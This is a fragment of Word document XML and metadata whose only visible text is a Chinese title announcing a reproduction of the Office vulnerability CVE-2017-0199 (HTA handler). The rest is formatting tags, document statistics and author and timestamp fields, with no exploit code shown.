        <w:t>office漏洞CVE-2017-0199复现：HTA Handler Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="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YjY5NjYxM2Y0ZWE5MGRmMzQ5M2Q2MTAzODQwYzlkNTIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="2AA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984</Words>
  <Characters>2547</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>6</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2657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2022-08-19T02:04:00Z</dcterms:created>
  <dc:creator>会移动的三百块</dc:creator>
  <cp:lastModifiedBy>会移动的三百块</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-19T02:05:04Z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84C444468E5844E9B85EE8AD71926C25</vt:lpwstr>
  </property>
</Properties>
</file>